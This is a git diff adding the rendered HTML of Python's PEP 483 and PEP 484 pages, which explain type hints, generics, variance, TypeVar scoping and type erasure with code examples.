+class FrameworkBase(Generic[S, T]):
+    ...
+
+class UserClass:
+    ...
+
+issubclass(UserClass, FrameworkBase)  # This is OK
+
+class Node(Generic[T]):
+   ...
+
+IntNode = Node[int]
+my_node = IntNode()  # at runtime my_node.__class__ is Node
+                     # inferred static type of my_node is Node[int]
+
+
+
+
+

Covariance and Contravariance

+

If t2 is a subtype of t1, then a generic +type constructor GenType is called:

+
    +
  • Covariant, if GenType[t2] is a subtype of GenType[t1] +for all such t1 and t2.
  • +
  • Contravariant, if GenType[t1] is a subtype of GenType[t2] +for all such t1 and t2.
  • +
  • Invariant, if neither of the above is true.
  • +
+

To better understand this definition, let us make an analogy with +ordinary functions. Assume that we have:

+
def cov(x: float) -> float:
+    return 2*x
+
+def contra(x: float) -> float:
+    return -x
+
+def inv(x: float) -> float:
+    return x*x
+
+
+

If x1 < x2, then always cov(x1) < cov(x2), and +contra(x2) < contra(x1), while nothing could be said about inv. +Replacing < with is-subtype-of, and functions with generic type +constructor we get examples of covariant, contravariant, +and invariant behavior. Let us now consider practical examples:

+
    +
  • Union behaves covariantly in all its arguments. +Indeed, as discussed above, Union[t1, t2, ...] is a subtype of +Union[u1, u2, ...], if t1 is a subtype of u1, etc.
  • +
  • FrozenSet[T] is also covariant. Let us consider int and +float in place of T. First, int is a subtype of float. +Second, the set of values of FrozenSet[int] is +clearly a subset of the values of FrozenSet[float], while the set of +functions from FrozenSet[float] is a subset of the set of functions +from FrozenSet[int]. Therefore, by definition, FrozenSet[int] +is a subtype of FrozenSet[float].
  • +
  • List[T] is invariant. Indeed, although the set of values of List[int] +is a subset of the values of List[float], only an int can be appended +to a List[int], as discussed in the section “Background”. Therefore, +List[int] is not a subtype of List[float]. This is a typical +situation with mutable types: they are typically invariant (a sketch +contrasting this with a covariant read-only type follows the list).
  • +
+
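 
A hedged sketch (the class names are ours) of why the mutable List must be +invariant while the read-only Sequence can be covariant:
 
+
from typing import List, Sequence
+
+class Animal: ...
+class Dog(Animal): ...
+
+def feed_all(animals: Sequence[Animal]) -> None:  # Sequence is covariant (read-only)
+    ...
+
+def add_stray(animals: List[Animal]) -> None:     # List is invariant (mutable)
+    animals.append(Animal())
+
+dogs = [Dog()]   # type: List[Dog]
+feed_all(dogs)   # OK: Sequence[Dog] is a subtype of Sequence[Animal]
+add_stray(dogs)  # rejected by a type checker: it would put an Animal into dogs
+
+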

One of the best examples to illustrate (somewhat counterintuitive) +contravariant behavior is the callable type. +It is covariant in the return type, but contravariant in the +arguments. For two callable types that +differ only in the return type, the subtype relationship for the +callable types follows that of the return types. Examples:

+
    +
  • Callable[[], int] is a subtype of Callable[[], float].
  • +
  • Callable[[], Manager] is a subtype of Callable[[], Employee].
  • +
+

While for two callable types that differ +only in the type of one argument, the subtype relationship for the +callable types goes in the opposite direction as for the argument +types. Examples:

+
    +
  • Callable[[float], None] is a subtype of Callable[[int], None].
  • +
  • Callable[[Employee], None] is a subtype of Callable[[Manager], None].
  • +
+

Yes, you read that right. Indeed, if +a function that can calculate the salary for a manager is expected:

+
def calculate_all(lst: List[Manager], salary: Callable[[Manager], Decimal]):
+    ...
+
+
+

then Callable[[Employee], Decimal] that can calculate a salary for any +employee is also acceptable.

+

The example with Callable shows how to make more precise type annotations +for functions: choose the most general type for every argument, +and the most specific type for the return value.

+

It is possible to declare the variance for user defined generic types by +using special keywords covariant and contravariant in the +definition of type variables used as parameters. +Types are invariant by default. Examples:

+
T = TypeVar('T')
+T_co = TypeVar('T_co', covariant=True)
+T_contra = TypeVar('T_contra', contravariant=True)
+
+class LinkedList(Generic[T]):  # invariant by default
+    ...
+    def append(self, element: T) -> None:
+        ...
+
+class Box(Generic[T_co]):      #  this type is declared covariant
+    def __init__(self, content: T_co) -> None:
+        self._content = content
+    def get_content(self) -> T_co:
+        return self._content
+
+class Sink(Generic[T_contra]): # this type is declared contravariant
+    def send_to_nowhere(self, data: T_contra) -> None:
+        with open(os.devnull, 'w') as devnull:
+            print(data, file=devnull)
+
+
+

Note that although variance is defined via type variables, it is not +a property of type variables, but a property of generic types. +In complex definitions of derived generics, variance is +determined only from the type variables used. A complex example:

+
T_co = TypeVar('T_co', Employee, Manager, covariant=True)
+T_contra = TypeVar('T_contra', Employee, Manager, contravariant=True)
+
+class Base(Generic[T_contra]):
+    ...
+
+class Derived(Base[T_co]):
+    ...
+
+
+

A type checker finds from the second declaration that Derived[Manager] +is a subtype of Derived[Employee], and Derived[t1] +is a subtype of Base[t1]. +If we denote the is-subtype-of relationship with <, then the +full diagram of subtyping for this case will be:

+
Base[Manager]    >  Base[Employee]
+    v                   v
+Derived[Manager] <  Derived[Employee]
+
+
+

so that a type checker will also find that, e.g., Derived[Manager] is +a subtype of Base[Employee].

+

For more information on type variables, generic types, and variance, +see PEP 484, the mypy docs on +generics, +and Wikipedia.

+
+
+
+

Pragmatics

+

Some things are irrelevant to the theory but make practical use more +convenient. (This is not a full list; I probably missed a few and some +are still controversial or not fully specified.)

+
    +
  • Where a type is expected, None can be substituted for type(None); +e.g. Union[t1, None] == Union[t1, type(None)].
  • +
  • Type aliases, e.g.:
    Point = Tuple[float, float]
    +def distance(point: Point) -> float: ...
    +
    +
    +
  • +
  • Forward references via strings, e.g.:
    class MyComparable:
    +    def compare(self, other: 'MyComparable') -> int: ...
    +
    +
    +
  • +
  • Type variables can be declared in unconstrained, constrained, +or bounded form. The variance of a generic type can also +be indicated using a type variable declared with special keyword +arguments, thus avoiding any special syntax, e.g.:
    T = TypeVar('T', bound=complex)
    +
    +def add(x: T, y: T) -> T:
    +    return x + y
    +
    +T_co = TypeVar('T_co', covariant=True)
    +
    +class ImmutableList(Generic[T_co]): ...
    +
    +
    +
  • +
  • Type declaration in comments, e.g.:
    lst = []  # type: Sequence[int]
    +
    +
    +
  • +
  • Casts using cast(T, obj), e.g.:
    zork = cast(Any, frobozz())
    +
    +
    +
  • +
  • Other things, e.g. overloading and stub modules, see PEP 484.
  • +
+
+

Predefined generic types and Protocols in typing.py

+

(See also the typing.py module.)

+
    +
  • Everything from collections.abc (but Set renamed to AbstractSet).
  • +
  • Dict, List, Set, FrozenSet, a few more.
  • +
  • re.Pattern[AnyStr], re.Match[AnyStr].
  • +
  • io.IO[AnyStr], io.TextIO ~ io.IO[str], io.BinaryIO ~ io.IO[bytes].
  • +
+
+
+ +
+

References and Footnotes

+
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0483.rst

+

Last modified: 2024-02-11 04:14:42 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0484/index.html b/pep-0484/index.html new file mode 100644 index 00000000000..5ff4f270868 --- /dev/null +++ b/pep-0484/index.html @@ -0,0 +1,2458 @@ + + + + + + + + PEP 484 – Type Hints | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 484 – Type Hints

+
+
Author:
+
Guido van Rossum <guido at python.org>, Jukka Lehtosalo <jukka.lehtosalo at iki.fi>, Łukasz Langa <lukasz at python.org>
+
BDFL-Delegate:
+
Mark Shannon
+
Discussions-To:
+
Python-Dev list
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Typing
+
Created:
+
29-Sep-2014
+
Python-Version:
+
3.5
+
Post-History:
+
16-Jan-2015, 20-Mar-2015, 17-Apr-2015, 20-May-2015, 22-May-2015
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

PEP 3107 introduced syntax for function annotations, but the semantics +were deliberately left undefined. There has now been enough 3rd party +usage for static type analysis that the community would benefit from +a standard vocabulary and baseline tools within the standard library.

+

This PEP introduces a provisional module to provide these standard +definitions and tools, along with some conventions for situations +where annotations are not available.

+

Note that this PEP still explicitly does NOT prevent other uses of +annotations, nor does it require (or forbid) any particular processing +of annotations, even when they conform to this specification. It +simply enables better coordination, as PEP 333 did for web frameworks.

+

For example, here is a simple function whose argument and return type +are declared in the annotations:

+
def greeting(name: str) -> str:
+    return 'Hello ' + name
+
+
+

While these annotations are available at runtime through the usual +__annotations__ attribute, no type checking happens at runtime. +Instead, the proposal assumes the existence of a separate off-line +type checker which users can run over their source code voluntarily. +Essentially, such a type checker acts as a very powerful linter. +(While it would of course be possible for individual users to employ +a similar checker at run time for Design By Contract enforcement or +JIT optimization, those tools are not yet as mature.)

+

The proposal is strongly inspired by mypy. For example, the +type “sequence of integers” can be written as Sequence[int]. The +square brackets mean that no new syntax needs to be added to the +language. The example here uses a custom type Sequence, imported +from a pure-Python module typing. The Sequence[int] notation +works at runtime by implementing __getitem__() in the metaclass +(but its significance is primarily to an offline type checker).

+

The type system supports unions, generic types, and a special type +named Any which is consistent with (i.e. assignable to and from) all +types. This latter feature is taken from the idea of gradual typing. +Gradual typing and the full type system are explained in PEP 483.

+

Other approaches from which we have borrowed or to which ours can be +compared and contrasted are described in PEP 482.

+
+
+

Rationale and Goals

+

PEP 3107 added support for arbitrary annotations on parts of a +function definition. Although no meaning was assigned to annotations +then, there has always been an implicit goal to use them for type +hinting, which is listed as the first possible use case +in said PEP.

+

This PEP aims to provide a standard syntax for type annotations, +opening up Python code to easier static analysis and refactoring, +potential runtime type checking, and (perhaps, in some contexts) +code generation utilizing type information.

+

Of these goals, static analysis is the most important. This includes +support for off-line type checkers such as mypy, as well as providing +a standard notation that can be used by IDEs for code completion and +refactoring.

+
+

Non-goals

+

While the proposed typing module will contain some building blocks for +runtime type checking – in particular the get_type_hints() +function – third party packages would have to be developed to +implement specific runtime type checking functionality, for example +using decorators or metaclasses. Using type hints for performance +optimizations is left as an exercise for the reader.
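 
As a minimal illustration of the runtime side mentioned above (using the +PEP’s own greeting example; output shown for CPython):
 
+
from typing import get_type_hints
+
+def greeting(name: str) -> str:
+    return 'Hello ' + name
+
+print(get_type_hints(greeting))  # {'name': <class 'str'>, 'return': <class 'str'>}
+
+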

+

It should also be emphasized that Python will remain a dynamically +typed language, and the authors have no desire to ever make type hints +mandatory, even by convention.

+
+
+
+

The meaning of annotations

+

Any function without annotations should be treated as having the most +general type possible, or ignored, by any type checker. Functions +with the @no_type_check decorator should be treated as having +no annotations.

+

It is recommended but not required that checked functions have +annotations for all arguments and the return type. For a checked +function, the default annotation for arguments and for the return type +is Any. An exception is the first argument of instance and +class methods. If it is not annotated, then it is assumed to have the +type of the containing class for instance methods, and a type object +type corresponding to the containing class object for class methods. +For example, in class A the first argument of an instance method +has the implicit type A. In a class method, the precise type of +the first argument cannot be represented using the available type +notation.

+

(Note that the return type of __init__ ought to be annotated with +-> None. The reason for this is subtle. If __init__ assumed +a return annotation of -> None, would that mean that an +argument-less, un-annotated __init__ method should still be +type-checked? Rather than leaving this ambiguous or introducing an +exception to the exception, we simply say that __init__ ought to +have a return annotation; the default behavior is thus the same as for +other methods.)
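 
A minimal sketch (the class name is ours) of the conventions just described:
 
+
class Account:
+    def __init__(self, owner: str) -> None:  # __init__ ought to be annotated -> None
+        self.owner = owner                   # 'self' implicitly has type Account
+
+    def describe(self):                      # unannotated: return defaults to Any,
+        return self.owner                    # but 'self' is still Account
+
+    @classmethod
+    def empty(cls):                          # 'cls' is the class object for Account
+        return cls('nobody')
+
+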

+

A type checker is expected to check the body of a checked function for +consistency with the given annotations. The annotations may also be +used to check correctness of calls appearing in other checked functions.

+

Type checkers are expected to attempt to infer as much information as +necessary. The minimum requirement is to handle the builtin +decorators @property, @staticmethod and @classmethod.

+
+
+

Type Definition Syntax

+

The syntax leverages PEP 3107-style annotations with a number of +extensions described in sections below. In its basic form, type +hinting is used by filling function annotation slots with classes:

+
def greeting(name: str) -> str:
+    return 'Hello ' + name
+
+
+

This states that the expected type of the name argument is +str. Analogously, the expected return type is str.

+

Expressions whose type is a subtype of a specific argument type are +also accepted for that argument.

+
+

Acceptable type hints

+

Type hints may be built-in classes (including those defined in +standard library or third-party extension modules), abstract base +classes, types available in the types module, and user-defined +classes (including those defined in the standard library or +third-party modules).

+

While annotations are normally the best format for type hints, +there are times when it is more appropriate to represent them +by a special comment, or in a separately distributed stub +file. (See below for examples.)

+

Annotations must be valid expressions that evaluate without raising +exceptions at the time the function is defined (but see below for +forward references).

+

Annotations should be kept simple or static analysis tools may not be +able to interpret the values. For example, dynamically computed types +are unlikely to be understood. (This is an +intentionally somewhat vague requirement, specific inclusions and +exclusions may be added to future versions of this PEP as warranted by +the discussion.)

+

In addition to the above, the following special constructs defined +below may be used: None, Any, Union, Tuple, +Callable, all ABCs and stand-ins for concrete classes exported +from typing (e.g. Sequence and Dict), type variables, and +type aliases.

+

All newly introduced names used to support features described in +following sections (such as Any and Union) are available in +the typing module.
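 
A short sketch (the function and class names are ours) touching each of the +acceptable kinds of hints listed above:
 
+
import types
+from typing import Any, Optional, Sequence
+
+class Employee: ...
+
+def f(a: int,                   # built-in class
+      b: Employee,              # user-defined class
+      c: types.ModuleType,      # type from the types module
+      d: Sequence[str],         # stand-in for a concrete class, from typing
+      e: Optional[Any] = None,  # special constructs from typing
+      ) -> None: ...
+
+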

+
+
+

Using None

+

When used in a type hint, the expression None is considered +equivalent to type(None).

+
+
+

Type aliases

+

Type aliases are defined by simple variable assignments:

+
Url = str
+
+def retry(url: Url, retry_count: int) -> None: ...
+
+
+

Note that we recommend capitalizing alias names, since they represent +user-defined types, which (like user-defined classes) are typically +spelled that way.

+

Type aliases may be as complex as type hints in annotations – +anything that is acceptable as a type hint is acceptable in a type +alias:

+
from typing import TypeVar, Iterable, Tuple
+
+T = TypeVar('T', int, float, complex)
+Vector = Iterable[Tuple[T, T]]
+
+def inproduct(v: Vector[T]) -> T:
+    return sum(x*y for x, y in v)
+def dilate(v: Vector[T], scale: T) -> Vector[T]:
+    return ((x * scale, y * scale) for x, y in v)
+vec = []  # type: Vector[float]
+
+
+

This is equivalent to:

+
from typing import TypeVar, Iterable, Tuple
+
+T = TypeVar('T', int, float, complex)
+
+def inproduct(v: Iterable[Tuple[T, T]]) -> T:
+    return sum(x*y for x, y in v)
+def dilate(v: Iterable[Tuple[T, T]], scale: T) -> Iterable[Tuple[T, T]]:
+    return ((x * scale, y * scale) for x, y in v)
+vec = []  # type: Iterable[Tuple[float, float]]
+
+
+
+
+

Callable

+

Frameworks expecting callback functions of specific signatures might be +type hinted using Callable[[Arg1Type, Arg2Type], ReturnType]. +Examples:

+
from typing import Callable
+
+def feeder(get_next_item: Callable[[], str]) -> None:
+    ...  # Body
+
+def async_query(on_success: Callable[[int], None],
+                on_error: Callable[[int, Exception], None]) -> None:
+    ...  # Body
+
+
+

It is possible to declare the return type of a callable without +specifying the call signature by substituting a literal ellipsis +(three dots) for the list of arguments:

+
def partial(func: Callable[..., str], *args) -> Callable[..., str]:
+    ...  # Body
+
+
+

Note that there are no square brackets around the ellipsis. The +arguments of the callback are completely unconstrained in this case +(and keyword arguments are acceptable).

+

Since using callbacks with keyword arguments is not perceived as a +common use case, there is currently no support for specifying keyword +arguments with Callable. Similarly, there is no support for +specifying callback signatures with a variable number of arguments of a +specific type.

+

Because typing.Callable does double-duty as a replacement for +collections.abc.Callable, isinstance(x, typing.Callable) is +implemented by deferring to isinstance(x, collections.abc.Callable). +However, isinstance(x, typing.Callable[...]) is not supported.
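 
A quick runtime check of the behavior just described:
 
+
import collections.abc
+import typing
+
+print(isinstance(len, typing.Callable))           # True: defers to collections.abc.Callable
+print(isinstance(len, collections.abc.Callable))  # True
+# isinstance(len, typing.Callable[[str], int])    # raises TypeError: not supported
+
+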

+
+
+

Generics

+

Since type information about objects kept in containers cannot be +statically inferred in a generic way, abstract base classes have been +extended to support subscription to denote expected types for container +elements. Example:

+
from typing import Mapping, Set
+
+def notify_by_email(employees: Set[Employee], overrides: Mapping[str, str]) -> None: ...
+
+
+

Generics can be parameterized by using a new factory available in +typing called TypeVar. Example:

+
from typing import Sequence, TypeVar
+
+T = TypeVar('T')      # Declare type variable
+
+def first(l: Sequence[T]) -> T:   # Generic function
+    return l[0]
+
+
+

In this case the contract is that the returned value is consistent with +the elements held by the collection.

+

A TypeVar() expression must always directly be assigned to a +variable (it should not be used as part of a larger expression). The +argument to TypeVar() must be a string equal to the variable name +to which it is assigned. Type variables must not be redefined.
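 
A brief sketch of these declaration rules (the rejected forms are flagged by +a static type checker, not at runtime):
 
+
from typing import TypeVar
+
+T = TypeVar('T')          # OK: assigned directly, and the name matches
+# U = TypeVar('V')        # flagged: the name does not match the variable
+# pair = (TypeVar('W'),)  # flagged: TypeVar() must be directly assigned
+
+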

+

TypeVar supports constraining parametric types to a fixed set of possible +types (note: those types cannot be parameterized by type variables). For +example, we can define a type variable that ranges over just str and +bytes. By default, a type variable ranges over all possible types. +Example of constraining a type variable:

+
from typing import TypeVar, Text
+
+AnyStr = TypeVar('AnyStr', Text, bytes)
+
+def concat(x: AnyStr, y: AnyStr) -> AnyStr:
+    return x + y
+
+
+

The function concat can be called with either two str arguments +or two bytes arguments, but not with a mix of str and bytes +arguments.

+

There should be at least two constraints, if any; specifying a single +constraint is disallowed.

+

Subtypes of types constrained by a type variable should be treated +as their respective explicitly listed base types in the context of the +type variable. Consider this example:

+
class MyStr(str): ...
+
+x = concat(MyStr('apple'), MyStr('pie'))
+
+
+

The call is valid but the type variable AnyStr will be set to +str and not MyStr. In effect, the inferred type of the return +value assigned to x will also be str.

+

Additionally, Any is a valid value for every type variable. +Consider the following:

+
def count_truthy(elements: List[Any]) -> int:
+    return sum(1 for elem in elements if elem)
+
+
+

This is equivalent to omitting the generic notation and just saying +elements: List.

+
+
+

User-defined generic types

+

You can include a Generic base class to define a user-defined class +as generic. Example:

+
from typing import TypeVar, Generic
+from logging import Logger
+
+T = TypeVar('T')
+
+class LoggedVar(Generic[T]):
+    def __init__(self, value: T, name: str, logger: Logger) -> None:
+        self.name = name
+        self.logger = logger
+        self.value = value
+
+    def set(self, new: T) -> None:
+        self.log('Set ' + repr(self.value))
+        self.value = new
+
+    def get(self) -> T:
+        self.log('Get ' + repr(self.value))
+        return self.value
+
+    def log(self, message: str) -> None:
+        self.logger.info('{}: {}'.format(self.name, message))
+
+
+

Generic[T] as a base class defines that the class LoggedVar +takes a single type parameter T. This also makes T valid as +a type within the class body.

+

The Generic base class uses a metaclass that defines __getitem__ +so that LoggedVar[t] is valid as a type:

+
from typing import Iterable
+
+def zero_all_vars(vars: Iterable[LoggedVar[int]]) -> None:
+    for var in vars:
+        var.set(0)
+
+
+

A generic type can have any number of type variables, and type variables +may be constrained. This is valid:

+
from typing import TypeVar, Generic
+...
+
+T = TypeVar('T')
+S = TypeVar('S')
+
+class Pair(Generic[T, S]):
+    ...
+
+
+

Each type variable argument to Generic must be distinct. This is +thus invalid:

+
from typing import TypeVar, Generic
+...
+
+T = TypeVar('T')
+
+class Pair(Generic[T, T]):   # INVALID
+    ...
+
+
+

The Generic[T] base class is redundant in simple cases where you +subclass some other generic class and specify type variables for its +parameters:

+
from typing import TypeVar, Iterator
+
+T = TypeVar('T')
+
+class MyIter(Iterator[T]):
+    ...
+
+
+

That class definition is equivalent to:

+
class MyIter(Iterator[T], Generic[T]):
+    ...
+
+
+

You can use multiple inheritance with Generic:

+
from typing import TypeVar, Generic, Sized, Iterable, Container, Tuple
+
+T = TypeVar('T')
+
+class LinkedList(Sized, Generic[T]):
+    ...
+
+K = TypeVar('K')
+V = TypeVar('V')
+
+class MyMapping(Iterable[Tuple[K, V]],
+                Container[Tuple[K, V]],
+                Generic[K, V]):
+    ...
+
+
+

Subclassing a generic class without specifying type parameters assumes +Any for each position. In the following example, MyIterable +is not generic but implicitly inherits from Iterable[Any]:

+
from typing import Iterable
+
+class MyIterable(Iterable):  # Same as Iterable[Any]
+    ...
+
+
+

Generic metaclasses are not supported.

+
+
+

Scoping rules for type variables

+

Type variables follow normal name resolution rules. +However, there are some special cases in the static typechecking context:

+
    +
  • A type variable used in a generic function could be inferred to represent +different types in the same code block. Example:
    from typing import TypeVar, Generic
    +
    +T = TypeVar('T')
    +
    +def fun_1(x: T) -> T: ...  # T here
    +def fun_2(x: T) -> T: ...  # and here could be different
    +
    +fun_1(1)                   # This is OK, T is inferred to be int
    +fun_2('a')                 # This is also OK, now T is str
    +
    +
    +
  • +
  • A type variable used in a method of a generic class that coincides +with one of the variables that parameterize this class is always bound +to that variable. Example:
    from typing import TypeVar, Generic
    +
    +T = TypeVar('T')
    +
    +class MyClass(Generic[T]):
    +    def meth_1(self, x: T) -> T: ...  # T here
    +    def meth_2(self, x: T) -> T: ...  # and here are always the same
    +
    +a = MyClass()  # type: MyClass[int]
    +a.meth_1(1)    # OK
    +a.meth_2('a')  # This is an error!
    +
    +
    +
  • +
  • A type variable used in a method that does not match any of the variables +that parameterize the class makes this method a generic function in that +variable:
    T = TypeVar('T')
    +S = TypeVar('S')
    +class Foo(Generic[T]):
    +    def method(self, x: T, y: S) -> S:
    +        ...
    +
    +x = Foo()               # type: Foo[int]
    +y = x.method(0, "abc")  # inferred type of y is str
    +
    +
    +
  • +
  • Unbound type variables should not appear in the bodies of generic functions, +or in the class bodies apart from method definitions:
    T = TypeVar('T')
    +S = TypeVar('S')
    +
    +def a_fun(x: T) -> None:
    +    # this is OK
    +    y = []  # type: List[T]
    +    # but below is an error!
    +    y = []  # type: List[S]
    +
    +class Bar(Generic[T]):
    +    # this is also an error
    +    an_attr = []  # type: List[S]
    +
    +    def do_something(x: S) -> S:  # this is OK though
    +        ...
    +
    +
    +
  • +
  • A generic class definition that appears inside a generic function +should not use type variables that parameterize the generic function:
    from typing import List
    +
    +def a_fun(x: T) -> None:
    +
    +    # This is OK
    +    a_list = []  # type: List[T]
    +    ...
    +
    +    # This is however illegal
    +    class MyGeneric(Generic[T]):
    +        ...
    +
    +
    +
  • +
  • A generic class nested in another generic class cannot use the same type +variables. The scope of the type variables of the outer class +doesn’t cover the inner one:
    T = TypeVar('T')
    +S = TypeVar('S')
    +
    +class Outer(Generic[T]):
    +    class Bad(Iterable[T]):       # Error
    +        ...
    +    class AlsoBad:
    +        x = None  # type: List[T] # Also an error
    +
    +    class Inner(Iterable[S]):     # OK
    +        ...
    +    attr = None  # type: Inner[T] # Also OK
    +
    +
    +
  • +
+
+
+

Instantiating generic classes and type erasure

+

User-defined generic classes can be instantiated. Suppose we write +a Node class inheriting from Generic[T]:

+
from typing import TypeVar, Generic
+
+T = TypeVar('T')
+
+class Node(Generic[T]):
+    ...
+
+
+

To create Node instances you call Node() just as for a regular +class. At runtime the type (class) of the instance will be Node. +But what type does it have to the type checker? The answer depends on +how much information is available in the call. If the constructor +(__init__ or __new__) uses T in its signature, and a +corresponding argument value is passed, the type of the corresponding +argument(s) is substituted. Otherwise, Any is assumed. Example:

+
from typing import TypeVar, Generic
+
+T = TypeVar('T')
+
+class Node(Generic[T]):
+    x = None  # type: T # Instance attribute (see below)
+    def __init__(self, label: T = None) -> None:
+        ...
+
+x = Node('')  # Inferred type is Node[str]
+y = Node(0)   # Inferred type is Node[int]
+z = Node()    # Inferred type is Node[Any]
+
+
+

In case the inferred type uses [Any] but the intended type is more +specific, you can use a type comment (see below) to force the type of +the variable, e.g.:

+
# (continued from previous example)
+a = Node()  # type: Node[int]
+b = Node()  # type: Node[str]
+
+
+

Alternatively, you can instantiate a specific concrete type, e.g.:

+
# (continued from previous example)
+p = Node[int]()
+q = Node[str]()
+r = Node[int]('')  # Error
+s = Node[str](0)   # Error
+
+
+

Note that the runtime type (class) of p and q is still just Node +– Node[int] and Node[str] are distinguishable class objects, but +the runtime class of the objects created by instantiating them doesn’t +record the distinction. This behavior is called “type erasure”; it is +common practice in languages with generics (e.g. Java, TypeScript).

+

Using generic classes (parameterized or not) to access attributes will result +in type check failure. Outside the class definition body, a class attribute +cannot be assigned, and can only be looked up by accessing it through a +class instance that does not have an instance attribute with the same name:

+
# (continued from previous example)
+Node[int].x = 1  # Error
+Node[int].x      # Error
+Node.x = 1       # Error
+Node.x           # Error
+type(p).x        # Error
+p.x              # Ok (evaluates to None)
+Node[int]().x    # Ok (evaluates to None)
+p.x = 1          # Ok, but assigning to instance attribute
+
+
+

Generic versions of abstract collections like Mapping or Sequence +and generic versions of built-in classes – List, Dict, Set, +and FrozenSet – cannot be instantiated. However, concrete user-defined +subclasses thereof and generic versions of concrete collections can be +instantiated:

+
data = DefaultDict[int, bytes]()
+
+
+

Note that one should not confuse static types and runtime classes. +The type is still erased in this case and the above expression is +just a shorthand for:

+
data = collections.defaultdict()  # type: DefaultDict[int, bytes]
+
+
+

It is not recommended to use the subscripted class (e.g. Node[int]) +directly in an expression – using a type alias (e.g. IntNode = Node[int]) +instead is preferred. (First, creating the subscripted class, +e.g. Node[int], has a runtime cost. Second, using a type alias +is more readable.)
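
For illustration, a minimal sketch of the recommended alias style
(continuing the Node example above; build_nodes is a hypothetical
helper):

# (continued from previous example)
IntNode = Node[int]  # subscript once, at module level

def build_nodes(n: int) -> None:
    for _ in range(n):
        node = IntNode()     # preferred: readable, subscription cost paid once
        other = Node[int]()  # works, but re-evaluates the subscription here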

+
+
+

Arbitrary generic types as base classes

+

Generic[T] is only valid as a base class – it’s not a proper type. +However, user-defined generic types such as LinkedList[T] from the +above example and built-in generic types and ABCs such as List[T] +and Iterable[T] are valid both as types and as base classes. For +example, we can define a subclass of Dict that specializes type +arguments:

+
from typing import Dict, List, Optional
+
+class Node:
+    ...
+
+class SymbolTable(Dict[str, List[Node]]):
+    def push(self, name: str, node: Node) -> None:
+        self.setdefault(name, []).append(node)
+
+    def pop(self, name: str) -> Node:
+        return self[name].pop()
+
+    def lookup(self, name: str) -> Optional[Node]:
+        nodes = self.get(name)
+        if nodes:
+            return nodes[-1]
+        return None
+
+
+

SymbolTable is a subclass of dict and a subtype of Dict[str, +List[Node]].

+

If a generic base class has a type variable as a type argument, this +makes the defined class generic. For example, we can define a generic +LinkedList class that is iterable and a container:

+
from typing import TypeVar, Iterable, Container
+
+T = TypeVar('T')
+
+class LinkedList(Iterable[T], Container[T]):
+    ...
+
+
+

Now LinkedList[int] is a valid type. Note that we can use T +multiple times in the base class list, as long as we don’t use the +same type variable T multiple times within Generic[...].

+

Also consider the following example:

+
from typing import TypeVar, Mapping
+
+T = TypeVar('T')
+
+class MyDict(Mapping[str, T]):
+    ...
+
+
+

In this case MyDict has a single parameter, T.

+
+
+

Abstract generic types

+

The metaclass used by Generic is a subclass of abc.ABCMeta. +A generic class can be an ABC by including abstract methods +or properties, and generic classes can also have ABCs as base +classes without a metaclass conflict.
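
For example, the following sketch (the names are illustrative, not
taken from this PEP) defines a generic ABC and a concrete generic
subclass, relying on the metaclass behavior described above:

from abc import abstractmethod
from typing import Generic, List, TypeVar

T = TypeVar('T')

class Buffer(Generic[T]):
    @abstractmethod
    def put(self, item: T) -> None: ...

class ListBuffer(Buffer[T]):
    def __init__(self) -> None:
        self.items = []  # type: List[T]

    def put(self, item: T) -> None:
        self.items.append(item)

# Buffer() raises TypeError (abstract method 'put' is not implemented),
# while ListBuffer() instantiates normally.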

+
+
+

Type variables with an upper bound

+

A type variable may specify an upper bound using bound=<type> (note: +<type> itself cannot be parameterized by type variables). This means that an +actual type substituted (explicitly or implicitly) for the type variable must +be a subtype of the boundary type. Example:

+
from typing import TypeVar, Sized
+
+ST = TypeVar('ST', bound=Sized)
+
+def longer(x: ST, y: ST) -> ST:
+    if len(x) > len(y):
+        return x
+    else:
+        return y
+
+longer([1], [1, 2])  # ok, return type List[int]
+longer({1}, {1, 2})  # ok, return type Set[int]
+longer([1], {1, 2})  # ok, return type Collection[int]
+
+
+

An upper bound cannot be combined with type constraints (as used in +AnyStr, see the example earlier); type constraints cause the +inferred type to be _exactly_ one of the constraint types, while an +upper bound just requires that the actual type is a subtype of the +boundary type.
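
The difference shows up in what a checker infers for a subclass of
str (a sketch; MyStr and both functions are hypothetical):

from typing import TypeVar

AnyStr = TypeVar('AnyStr', str, bytes)  # constrained: exactly str or bytes
BS = TypeVar('BS', bound=str)           # bounded: any subtype of str

class MyStr(str): ...

def concat(x: AnyStr, y: AnyStr) -> AnyStr: ...
def first(x: BS, y: BS) -> BS: ...

concat(MyStr('a'), MyStr('b'))  # return type inferred as str, a constraint type
first(MyStr('a'), MyStr('b'))   # return type inferred as MyStr, the actual subtype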

+
+
+

Covariance and contravariance

+

Consider a class Employee with a subclass Manager. Now +suppose we have a function with an argument annotated with +List[Employee]. Should we be allowed to call this function with a +variable of type List[Manager] as its argument? Many people would +answer “yes, of course” without even considering the consequences. +But unless we know more about the function, a type checker should +reject such a call: the function might append an Employee instance +to the list, which would violate the variable’s type in the caller.

+

It turns out such an argument acts contravariantly, whereas the +intuitive answer (which is correct in case the function doesn’t mutate +its argument!) requires the argument to act covariantly. A longer +introduction to these concepts can be found on Wikipedia and in PEP 483; here we just show how to control +a type checker’s behavior.

+

By default generic types are considered invariant in all type variables, +which means that values for variables annotated with types like +List[Employee] must exactly match the type annotation – no subclasses or +superclasses of the type parameter (in this example Employee) are +allowed.

+

To facilitate the declaration of container types where covariant or +contravariant type checking is acceptable, type variables accept keyword +arguments covariant=True or contravariant=True. At most one of these +may be passed. Generic types defined with such variables are considered +covariant or contravariant in the corresponding variable. By convention, +it is recommended to use names ending in _co for type variables +defined with covariant=True and names ending in _contra for those +defined with contravariant=True.

+

A typical example involves defining an immutable (or read-only) +container class:

+
from typing import TypeVar, Generic, Iterable, Iterator
+
+T_co = TypeVar('T_co', covariant=True)
+
+class ImmutableList(Generic[T_co]):
+    def __init__(self, items: Iterable[T_co]) -> None: ...
+    def __iter__(self) -> Iterator[T_co]: ...
+    ...
+
+class Employee: ...
+
+class Manager(Employee): ...
+
+def dump_employees(emps: ImmutableList[Employee]) -> None:
+    for emp in emps:
+        ...
+
